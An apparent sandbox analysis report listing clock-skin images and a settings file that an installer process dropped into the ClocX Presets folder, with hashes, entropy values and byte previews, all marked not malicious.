C:\Program Files (x86)\ClocX\Presets\AquaLarge.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	46620
Entropy (8bit):	7.961746017021179
Encrypted:	false
SSDEEP:	768:Mfbx5EU99lKeGQVYgofZgJTe1mY3FABwXRfrd5Z3H0Yzf5VrZmX:Mft7seG3g5e1mY3EwBR5Z3Hnj5VtmX
MD5:	FD4E0D5D5A8A964E2B25D1CFEBE5A4A6
SHA1:	CA0A5D1F4D0D7910F6677113710278C766902AB1
SHA-256:	2DEB821546723BA504DC12614B388CFBCCB785C74D7C5EC04033E66642187771
SHA-512:	8EC6DC56990120818357C0ABB7C1F95AE5E5108BC8B3D3858236E42FCB0B84CE14D1F322C298AB8B242575F00E5B9D5764570D8FA9326F8EAEB3B306A91B5AE0
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(..C.....h........q4.(.3J..?..(....h4..........R.....,.r.,.2L.L.....@9Q _.H..1....'#.#;........'.......d.....{..k .%........?......3.gH...h.....h4..%R.ajj.4e..].v...V.M..&0Q....0.#41.S..0......2F& .5x...... .........m .....~.....\|........O....8.o0...f.l...L..,,,..L.z.H.........B. ...HJ.D.I.............. q....#%n ......@.....i5..SP[Gt...@.#....v.Z.yyy.fffk&f&+ m.L..r.}d.....0q..%.. .?.....0[....?...$~&&fp...%``..'`.. .d.........l.#8A..&.S@;..."G.<xp.....Z..... ..GR.]0o........u.&.{`B.B.... .4,.2@.)...JC............Xbd.$fP.........a%6..\......R.o.@3...k..\|...?..^.......HI....8....}..999.....HLA..n.B.)..&FP.........f.r.....9..p...JX01H......Nx....D... ...'Z&hBf..L.......Q`..X2..v.w...}........p_.7..0..E<2......kh.D....Vg......i.V....y..`....1..:.c.P....PAK..BP.sQ.}....A...c...& x.3..`.b..4..O.m.....#..j.....}#..gJ..{...[.......A.

C:\Program Files (x86)\ClocX\Presets\AquaMade.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27995
Entropy (8bit):	7.902628308729259
Encrypted:	false
SSDEEP:	768:xp4+24RPlPmseLV72TgAUjwVq16Z9Xd12XIVVL/wUjJ5Vq:jpHheh7fvjwV2m9X2O/wWJ5Vq
MD5:	9AAE18427A5BF4B00F9BA4A58AE01A05
SHA1:	4D59CE4542295D5C2E5B9A9325C6191C3AE25FE7
SHA-256:	0DC9ADDA1AC844E4A8C3D5A9033B2EE35D1AFC81988FAA155E88308AA16D9499
SHA-512:	73CF29E377DECC34A31D5824E43EDD6050BBBFCF4DE8A33AB423C15122F6D7B93B7A3F7E7FBB3B3C9E1BB1951DE834D80FA69A02931546C9A1CCEDD8328009FE
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..l.IDATx.b...?.(... .X..g....9T...E...Y.(.....bI [...I.H.310q.i..F..F..?@..@.7........H...32...T..?.?.~.:.e...,.....P..............##..##..#...0)..=.O.X....#..".8X......,.....7......]....7/...tl.......hH%.`.0....3...12.X.....Y.........)!0 %.F.........L..LL@6X.l.E ..?...................@.>...u-._I.Vv7F&f'fff;..<...E3.?.....A....`..Vb@..H..2..`.$.&x..bf&.f&X......>......?w....PH...4(..#$[2j...311{.....Y.[..#.....#.\|.8.9..V........@..............X.a...d..`......m{..;.q...i..4...4.........\|. ....7.9................G..p.....J{..V`.....(.Y@..............^:\|....V`.a........l.. ..E..E..m@.#3k(0....c..K.G.x.....~.f......@../._..........?H..M,.L..u>.X..rp.f.D,.fae.cHi...%...f..!U.0...03.fa`.&...0.7....w...b0%....;..@...qYP\|..x.......W..0V........K\|.?11.^...;.f..)...g..n.Z}[.....M.......N.u4to... .G.1t4@...a.p.J#;..L....[m.L.k..2.).....\/...R.*.t.M..>d(z.r../u

C:\Program Files (x86)\ClocX\Presets\Aqua_Apple_Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 100 x 122 x 24, resolution 2834 x 2834 px/m, cbSize 36656, bits offset 54
Category:	dropped
Size (bytes):	36656
Entropy (8bit):	6.288881463678386
Encrypted:	false
SSDEEP:	384:ovrz7c5apfURSGfJJsvMOO7WOhc4tHwOormPeJ7bEnb6f1ofnpapYR+MqV0yT:AZUzVOO7WODtHwOormPPU4nhuVfT
MD5:	9AB412A79776C5575EAAC0D8CB36C294
SHA1:	B8BD1945591A00235F5C8C80076F7B54C421AE4C
SHA-256:	093E1350402900EFAEE414D0506425A690A4EABCFD77A78A1979B2E072FDB083
SHA-512:	D6BB2EA1A8AA4200B054BB7FF65BE4535D57ED7EA3531C2802A116D7FDA0EB53134170BAC32993EA1E43B08BAF879967920C4AE6DA023D625AE92219770B89B9
Malicious:	false
Preview:	BM0.......6...(...d...z...................................................................................................................\|\|\|uuuppplllkkkkkkjjjlllooouuuzzz..........................................................................................{{{vvvqqqooommmnnnooorrryyy................................................................................................................................................{{{tttoooedd_\Z\ZY[YW[YX[ZZbbbeeeeeegggjjjrrr{{{.....................................................................}}}uuupppnnnkkkiiigggeeedddeeefffeeefffjjjsss.......................................................................................................................................\|\|\|ihgjbZygV.jR.lP.kO.kO.kO.hOycOl]O`YQYXWccceeegggmmmttt~~~...................................................~~~wwwssspppiii`^\f]Wl_SwdR}fR{eP{eP~gRxbPh\Q[YV```gggkkkuuu....................................................................................................

C:\Program Files (x86)\ClocX\Presets\Bahnhofsuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30183
Entropy (8bit):	7.905187050462904
Encrypted:	false
SSDEEP:	384:iJ7Z3xRpqfyMY75H8OWTuMcSVp4yiuNtv9lPadvB5iAR63e0MHAFq/zVIe+c9NAD:OZ3ReyMgFsuMlHFP9lyF7vkqOtwrY
MD5:	194E941B01069DFD6ADAA0EAE5133FD0
SHA1:	320DD2E272DC6AB8F96C837262E2AE13330F50A7
SHA-256:	02696689D1EF5B7C77CE40C439CD6D9BE7F4ABDE14B59F52297CD113955B6947
SHA-512:	727A6C4142D8E1FF0D41D16BF704448303B1DF2DF00EEBCBB1E888C09D2C2043518EB828FAA3006A3D71ADF914EF6B1CF2EB70D5F7C4F0C2B7408DDAD6424CBA
Malicious:	false
Preview:	.PNG........IHDR...............P....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..u]IDATx.b...?.(... ..F.`....h"......2.=... ..f@....$.+.?..O..b.F......lf46...&,........P............. .X.x.gF. ..zyy.YYY....*......Kqpp.333.....i. ....4._ ............?...?~....../_.<~....C...=r..;...@....%..H.c.%...b...E....a...RuEEE.>>>]...Mnnn.`..#...D....!....FVVV........4...?0..y >010@....LLL.......(.........^.~...So...B..`.c(....4...4.a....zzz....6....H7.F.>P.... ....ap$....`...Ps...R.d.\..N......d.F..(.......q.....M.v....A..4A..bp.... ..]"@..."......,%%...t+`..r7rN.E ..r=4..l.<r..".V".h`5.....(@.$.K@0;a..@b 7....w...s......@..@...(~#....t...A...r=... ..>..T.......w...V....A.....`E:........o........>\|`...+...g...;...Y........P...Y.@3.r.......\..yyx....1...1....IIJr...6.....`%.....{......<.k..w..~...H%..T:..`.lr...(.t.I.,lM....x....q....#..X".P.W..7..I.y..s.L......"..1.(.<.!..q...X......E..E..PU..Y.Q@....\|.fD...M.......@...

C:\Program Files (x86)\ClocX\Presets\BaiWeather.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1538
Entropy (8bit):	4.912643629219799
Encrypted:	false
SSDEEP:	24:BEZrGXE5lr9BxjTJaKhVY/hTOLX01rfXkpFdGIo85bifKzo+ibQ0Wd9iBxLuQI:BkqyllTJfgt+vdGJszohQJTiBxLvI
MD5:	D4F3C4B3EE12CDDFF6A83E9AAA565B3D
SHA1:	696F89C01B34E6DDDA7035ED179A8CBB4D7043D9
SHA-256:	73DDEBF290683CE599E79003F95A804E17498ED4403D10CDC8B2092B4308A4C9
SHA-512:	72C3CDC6045DDEC39718951AF431989EC88072458605570C5630BAA9D34A2A2FA917542F8CAD785C09AA642624C086A64DF1366D2FE2E91F79BF6571D7294376
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xAC6C1C ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xCECECE ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xCECECE ;color of minute hand..MinuteLength=56 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x18c7f7 ;color of second hand..SecondLength=57 ;length of second hand..SecondLap=20 ;overlap o

C:\Program Files (x86)\ClocX\Presets\BaiWeather.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 161 x 161, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33642
Entropy (8bit):	7.9898594034987465
Encrypted:	false
SSDEEP:	768:0+BKTCFpP9wB4YZfKoAf8qzfc9XIpV8JzO64:0CNwflfA0Afc4X8JzC
MD5:	796618351AEB1C80C1FEF6579990FB9F
SHA1:	896ADF790D7FAB3E97079C4E5CB461A45B821AD3
SHA-256:	CA04C21BA94D6E432C436A26FEF81609AA40C783462624CA191DB9710FC84750
SHA-512:	21BD6661731B0481602D6A8D5985137EDA95648FF87A11187688853F899E352EEEA12CF8EC70460E2930E10E85FC84E569B5D5656FC038D8359FEC72791AC7F3
Malicious:	false
Preview:	.PNG........IHDR..............Q....+tEXtCreation Time.Thu 7 Oct 2004 18:56:56 -0600...{....tIME.......]......pHYs.................gAMA......a.....IDATx..{.eU}..k?..>f.sg.y..(.Ff..."...i@..iM.6`c.....?.?.........m5E.Tic...DE..2#`G...}...k..[..........=.s........w.u..f....................pEG\T...l&.D&.5Y.r.-v...R..JW.T...W^p.H6?......4....3[]eO3R..Z.U.1.iWV..Y....Z1.J....:.`.M.0.'..Gk;......;.?.........ZB...\|'>2Wm......q;....fK..CUX....V. ..n....A,AU.?.4"U..3s..Je...@.h...p.k.'..R..U'F..5..3u.>: .[i.};..p`b..M....._...9.....r.\u..(^W...b.eU.;.TeZ...'..4....lI&.$..&......8.C.H^.b...v.v(!.Z...JR.R:8.S.Y...%,...N".L.H..z:..X:.v(e5..$...v....V..}./n.q....~./.......o.O?.-U._.l.;.ewg..p..L.......".,.qa#a.K....".r.^.."...r).9..^....).6...b......Xr..B4.....PL..JP.%......ZJUK.8...~.n..;..............{...._V.:....O.Wf.....//..7.t.....I..@V.\|..VQ?.....)...(j..J.:..1\|.RXT.:B3L...\|5.gr...A.-?7...m.x.C.."......:.%....$l.2r.....&}g....i.C.-."q..4R

C:\Program Files (x86)\ClocX\Presets\BallClockAmber.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	6.83338253674313
Encrypted:	false
SSDEEP:	384:Ds2SUYkFxoF79oRKLcX/uWL8Owlk75v9h2y/rrftfLDdOKVLB0lGuRsUxlIB:g2YQXRKL8/wM1Yy/rrftjPLB0wuRsSIB
MD5:	13B2CD8AC7C2041757E7F8133F3615AC
SHA1:	421F8E88710E56BE792B4E2C5CF7B80F2DF9FB5F
SHA-256:	C07DA73ED598A9E0C3064791984360B211031CAC9B42A42EC50C1EB7E5C12B3A
SHA-512:	C53537E84E7C9560EA2BB963D696B18A968A8F94D764C46A52E6E3419F0AA8628DDC315C185D0F3799D6585F15EAD807B125BC708CD393FE4402BF0D831DE2A5
Malicious:	false
Preview:	BM.}......6...(...h...g...............................................................................................................................................................................w..o..m..j..j..l..o..w..}..........................................................................................................................................................................................................................................................................v..i..b..\..[..[..Y..W..X..W..V..V..V..V..V..W..W..Y..[..a..h..u............................................................................................................................................................................................................................................u..a..Z..Z..[..[..\..]..]..]..[..Z..Y..V..K..@p.V..W..Y..Y..[..[..[..[..Z..Y..X..X.._..s...........................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockAmber.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18400
Entropy (8bit):	7.856496562747338
Encrypted:	false
SSDEEP:	384:5td1uc5PdIUsIhMmNNRTHzhTjXQKnZVwIvXTY4XhP+e/Tsjf:fdooNlNAmLXZxP+eIjf
MD5:	C0B3CD6A12D50F9CD681BBAA03015423
SHA1:	DB1EF651280D3B37A279D1F56BEA4959563BD46C
SHA-256:	A7AC46F2D7C9FEA9C99F356A18D4F3D4814DA0D93584209C69E8BE36BFD600CE
SHA-512:	BAAA73846A66D7F28C7167C8E57F2B122EBCEB772A09B01984E151292626A469126003DDF707A342E760D035C304C3371A5E3ED890E28BC66D5679071F53D45A
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..GVIDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........".I..KG.AJ..A...A...A...A...A..@..?.N.J.h.....w ~..?........p..o..o.3<.......H..C.d....P.`.t.g..c.S.b..ec0`cf..F....#... P..L......?..W.Dq.._...1\....K...".=! ...........pE<..1(..3.p.08.01.../..g.W..}........~.'%P0p.)30q.0\|{r......zT.......g..a8..#......A..... ..c.@.x&...+.........`....7...~ .O.....[..~?.......p../..v...5M...{....0..O(0....._.1l...a.....`K..q..@.)....RK.].>.pN..@.3...j."........a`....AM./C.Y.......R..jo.gfx...A_.'.g`..~#. ').`.u.\2.GD6..J.@.g@{.?....8........ ..C......f..d0..fH`ca....b.tF.H..p.J2..+2.I.1.J(3p.0...3..Z%"!.o..P^R.........p..i.]M5.f.....}cX.r.............d.....W..............?.........._....g8.L...SB@.s..b...=...g..x.`......FH...h.G>..q.2.).2.i.0.jX1..j1p..10..

C:\Program Files (x86)\ClocX\Presets\BallClockAqua.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	6.731943420864348
Encrypted:	false
SSDEEP:	768:Hc0SD1wzFxbmt9DT8vkbZKHrI2mmLyKBRygYK0s:80w6ZiSVlbyKBbYo
MD5:	25F334F4A79DAD4448C324BC0200F02D
SHA1:	306892204CE74FC72E197788E4ED03270574E889
SHA-256:	93C5D3A982E8BD1E17579D41A833155E5BEC92FCF2063D6E14B9F7E8F6FE4613
SHA-512:	04FD745EFEC76FD83356C3F7EE7DFB6676E966FFD80EFF7C1E86784B4D0B08530052E0C8CED07BBEAFD114C410A21484E34CBBC31B84B7746E4DB8B17962AB39
Malicious:	false
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................x..f.....................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockAqua.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18528
Entropy (8bit):	7.8611486566871855
Encrypted:	false
SSDEEP:	384:5DR08eJq+7lRlGCjOa1tplFiea2xb5xa3y7q28T:QXqCj/1tplkyxdxUyW3T
MD5:	31ADC20E79C6F0B4B4BD624C4960A24E
SHA1:	0DD73A3A8B5E8FEA8AAF86DF4EF8EF608EAC411D
SHA-256:	01EF0594D6B5E5E5C3C02475E1096CB9A307C40E167DD26D11BFE352C458BC08
SHA-512:	AD204A9088438012195F5AC8E1DF9FE78C3EF7416D8F9D36A5CC41998F57A47F7B3A47BAE7444EB70C7FB73726154985042F0A84BB350FDCE49CBFD83AE9B131
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..G.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........".C..U.P..KT...W...M...E...I.....c...d.F.. ...2..3.{....c....0..\|....~.<.....H..C.d....P.`.t.g.6H.c...fb.3.F..##...#...S.@y62...L.....{....;.Dq...O.~..q....".=! ...........pE<..ZT(..(.0.r;02...= ..g._.32p..g`....'RR.......7;...?...g..G...j_......._...p.....wqD..L..q..@.1..G<.zNg.0tbd..cdb...p\...SHl..y./..2....dbx.G.(..V#.......l.......3.b....?B.....?'.............[B@.s...L..o...4...3.p....=..P".......X..>..$....d#.?.....[..&...30~{.._....../.0.J)0<.q...$.....8.q%.......m....W~:.py.&..8......pF<#.'3.M....T.#.....G.........`......A\..AN..AY..AQ..AV..A......O.)...'K...r...(.&&&.3.O1.j..mfc...?..U..6....^0....N.;.>1<~.........&........~n....OG.......`J..q..@,...g...L.6.:,.J......qb..L....de..g0..b0

C:\Program Files (x86)\ClocX\Presets\BallClockIce.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	5.985389961863382
Encrypted:	false
SSDEEP:	192:DZ8oIe45flGoS3iItFTeQsHyXw7Hmyak1v+1fveN3e9Iy6CGCMV6JgMuutekplCl:DFRSItFaQsHyXw6kIqD0lwhI2uy
MD5:	6C0B705BDE7D2AFE37253E45524B729C
SHA1:	46BBAA392E19944FA0DC67A867D6BAB5C5FABE8D
SHA-256:	C0E1C4843953607594FA2D32CA85BD516D6BF19FDAC0C49F6D7C71702DEC57F1
SHA-512:	BC0F736ACA104903F6AD106A2875202B64C7A112B3F055AEFBE293547F93FB784E765B94B4A0571011E722162B7C4A5EB75A2FF4AB122BAB4427D3F94F7D1266
Malicious:	false
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................HHH~~~...lllhhh.............................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockIce.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12805
Entropy (8bit):	7.853853054587897
Encrypted:	false
SSDEEP:	192:WSOYiiwKNMtJKMvHuOoOHZofl5rndayVeTtVUEilpFe7mfWq13L3wHR4dv3O9THx:5Y6WnjHZoflxV634FKGWW73eSdveIkz
MD5:	7341D4B09D1030D1CECEA62EDBD8DE93
SHA1:	060A6A44ED3C889908824ED64B31888EE65DCA7F
SHA-256:	89A25A2C8D5A5B26F1C3749282AE1FECC42B690219D985392336747FE1A550FB
SHA-512:	C2AC9391085B96E8CCE8A0F0C76B3817034B25B0E7D5F353A72CE92D30BCBC63D38D0844B25A82F5FA4390077FC5E3E4F0EF993FF9A8B6BC16979E618AA93F17
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..1{IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........"...KKSKJHHH...K...U...Y....]....H.......w@........}..o7.{....k...>...D.9.J.....%..HG.x...1%%%m....`d..#Z...I..'A.<..v..........&.;.Dq../...wu.....".=! ...........pE<....)....prr:....../..g..a..>}.. $,....W.6V6...}......F&F.^.^.`.a`cc..6.....=.......<>2k..8".P&..8.......#..=.kii9..u?`.[@s8........./....2p.s0.Y.....AWW.,...+../^.c.?.....<}........,...%0.....`u...k......[B@.s..b..9.%.ssru....988...!.+..1......?~0.K...7o2....s9.\|...ABB..h>8p@.lfHKMc...f.V....a$;..U.'??.....3....O.>]9y.....gDK......@........f...1...K...>@..b.tP.!G:(..................,0.......PWW.....N...g...f.....>u..CFF...s..x....A..?3.s9J"...6.....,q..K..S.N9.Lx..S...f..b.....K.3.s....l&0.....-..".TW...3HJJ2H.K0...0......7.u;....

C:\Program Files (x86)\ClocX\Presets\BallClockRed.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 104 x 103 x 24, resolution 2834 x 2834 px/m, cbSize 32192, bits offset 54
Category:	dropped
Size (bytes):	32192
Entropy (8bit):	7.056071030869739
Encrypted:	false
SSDEEP:	384:DM7J9t2ORX9hUmbPtJ4T9oF4UeMPNShuK/3mNvQTgUX:w7JPX9hFnoiF4UeMFeum04Tgq
MD5:	E26AD55938AE56FEB11B2450A5A02B0F
SHA1:	5436A23577C3F33038963C8F44D8BEE50DD5FCCF
SHA-256:	0FABBE61F9E6638B396FE35F2A02CCAB1AF7D2DE40E284318565B7983FD58408
SHA-512:	E07EF075F6833C193412F41F0F5B235E76759FDD70CC8126FBC68BC3689C369BFDE7795356D7A6EF826C70F57AA879A6FC698EDEEC41D6E234D006F647CC90AF
Malicious:	false
Preview:	BM.}......6...(...h...g...................................................................................................................................................................................y..w.~v.~v..w..z..................................................................................................................................................................................................................................................................................}y.xt.tp.tp.un.so.sm.ul.vk.vk.vk.vj.vk.rm.rm.ro.sn.so.vr.\|x.................................................................................................................................................................................................................................................us.rq.rq.tr.ts.ut.vu.vt.ws.wq.xr.wo.zn..p..sx{n.xo.wo.vp.ur.ur.ts.tr.rq.qp.pn.pn.rq.............................................................................................................................

C:\Program Files (x86)\ClocX\Presets\BallClockRed.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18975
Entropy (8bit):	7.848170374392596
Encrypted:	false
SSDEEP:	384:56UKEwcqBzASUGvcXbSSnUWCi6WExgCY9vgHA:Av8qBzAfGvcrSSnUX3XK
MD5:	48C63E4358B3C3747F617A6B636ACD74
SHA1:	E22EB43B6E4EB4BD758BC3F8A07CFD4589A2B616
SHA-256:	80D565FDEDC4640C7F0C1086B53B0741449770899122EF1E4BD718CED53F2523
SHA-512:	942AC646B29303ED8CB73153466AB2480B48959A484E831CA3AD7FF77EB01E16ED1D2EB5150BB9AEA0B095DB3396896E91F1F1E1EE4C75A7362A731840387B85
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..I.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.. .d.##.H.3.....=..{~.....>......".s.........@.%.p E0...D.-..?.z........s8#.6...?......C-........"...K..YJ..Q......#.....,...8P.....H......@.............p.+..w..?........#".p.... ..B..-..#.1..]L..I......Q......b@IA.<..v....{`.x......../.a.....WW....)....2.1.K.......W..q....,#..'#..0+...%...;#..\|...@..>.B..!.&.eu.F>.....20...V.9W..(..........x...Y.~.....2! .9@.......L.9].............=......0...a.X3.A..^.........y8.c.C.&6v.YIN.....o.......3P..L.'.............[B@.s..b..9.%.s.8t....9.....R.".[=....y....1._>..6.'.0..0r.......2.g.`0.5..3...A....~......f..&....j. ....gd..`fyf......+'..q....-!..v.@.....g.s002.s..12&.10...y.c...\|&(..........<...*...".........O^!.A>...r.....B..20.5.z........w.?_>3......C..e.,..2\|.{.....^........T......W../............9....e..z&,.....l.g.#>...k0r:..Zg`..a...a...d

C:\Program Files (x86)\ClocX\Presets\BigBen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 254 x 254, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	52018
Entropy (8bit):	7.988592195271539
Encrypted:	false
SSDEEP:	1536:ycHNm1xLbHcKpCtCvfMw3kGMZ2Bc/p8Xp:Ftm14C30Gw2Bc/p8Xp
MD5:	20F7051C41230A7C304AE9FCC2B1672A
SHA1:	6F601C41AC367325375DF553EC8C3E2907A4A6EF
SHA-256:	69274CC505982E37F5CC1CF478775E4FE5CECE83AB1C836E924C4FBC702391CF
SHA-512:	8ABBA59074E457AD058564B37A879474E5DD7BE2C5B92C5534FC0B87E8112D7F7C0B1296056BBDD5F15F73B7E556618FCBAFEC8D059D5AC95685122EFBE0A6EE
Malicious:	false
Preview:	.PNG........IHDR................Q....tIME.........'O....pHYs..........iTS....gAMA......a.....IDATx....]gu...rz/...F..l..q.`0..@.@..Br...~o...7......@(...W....l,K.z...9..}v.k}..kb.R.l.,=.9.Sv...U...MiJS...4.)MiJS...4.\|..\.@S~1r...N...J..Je..b.ZQ...0..2l(.....o..p$.D...X...8.6..S..l........@.<.y..C.8u..,.Z.eMG.V.^...U...jQ..8.m...B.-X.N.k0. \|...1/B!..I..:..r5z..a.%..C.h..B.......9...N...;w....n..p..t+R..b.."..ZZ"H%..(".... <..L9... .K0....Tr.1?=..L......Y.J...9.."d....m...v.V.l..)...x.H.....{..;.......p..)he..d..G.`.;.X..Y.d.X\B.e...~.t=D[..`.....K.>.%.a....@..C1_E...azN.33..9C.......^.."%...-qgrz.V.eS................?;._EG".B...X.q.b..fy....;..r..../p8.\].]...[...Z....w.\|....q..A.6._6.......g.b.@..X6[(..4Y..V......G>....b..cHE.p.a.Z..N..n..E..4m..`g...9...\.6.....T.G..O..}.o..o...r.'[;..S8zp...<...)g.U...m.v.w...\|....B.R]....x.I../3.?.m..o.......uW^...;..-..._m....$\.2..T..6@n._+...f.{.&.k......^...g.........[0.1.;^.=.<.@..]....-k2..

C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 118 x 24, resolution 2834 x 2834 px/m, cbSize 41592, bits offset 54
Category:	dropped
Size (bytes):	41592
Entropy (8bit):	6.224189134230555
Encrypted:	false
SSDEEP:	384:eXNleXJJIKo5QHHHHHHHHaHHHHHHHHHHHHh/+tMHHHHHHHHHHHHHHHHHHHHHHHHd:7XJJt0ZlN1uBaCAv1hEPWU3c
MD5:	12232B20B415DECC653B6BC5B9F0DDDD
SHA1:	E63540F2F7A39603DE5B4AA212690DBA028A2F42
SHA-256:	CDCAA8879D4B2C318F27CE0AB3048061A71E0F1050090BA53C54562D175DEB30
SHA-512:	6994257DA58D28A185DD212858EFA4D3C1CFC1CD57F1BE43C2693DDBDE2D688668C043798773CE933FBA202D74BAD0D6B90C6806A483AD6A99068CA938E0F3BD
Malicious:	false
Preview:	BMx.......6...(...u...v...........................................................................................................................................................................................{{zyywuttsrrrqqsrqqqqqqqsrquuswvuyxxzzy.......................................................................................................................................................................................................................................................................................................{{{vuuoonjjifedcaa^^][[ZYYXXWWWVVVVUWVVXWVXWV[ZX\[Z]\[a`_ddciiglkjqpputszzy.........................................................................................................................................................................................................................................................................\|\|\|ssrkkjddc_^]YXWUTSQPPNMLMKKKJJIIHHHFHFDHGEHFDHGEHGFIHGJHFKIHLKINNLQQOTTQXVUZXV]\Zba`ffemlkuut~}\|.................

C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24027
Entropy (8bit):	7.908755071537191
Encrypted:	false
SSDEEP:	384:5fOprdUBSqoJzEJzpXqIVCiBZ75lAIy9Q/Z8RpzjLn6itBtIOe4HY85Y+KeFz:ROprKPezA1LVCiJTZ8RpvN+OemY2YGFz
MD5:	EBFD13181F171F5E71D710A6EA9F129B
SHA1:	E435734C679F3D7360B58498416703E63B41B699
SHA-256:	B30B748AAC01BCF421013976B3BA9DF1DA074077D35773624E5B2411D7E49B52
SHA-512:	BCD11A5F1861AFF7656F9FDB9D861CAE038A3A186C0B4163011C18702E687BC6988DB5C5F54F49774F38DFB2F42ECD925AADA31A0D423A615E52BAC82A1086DB
Malicious:	false
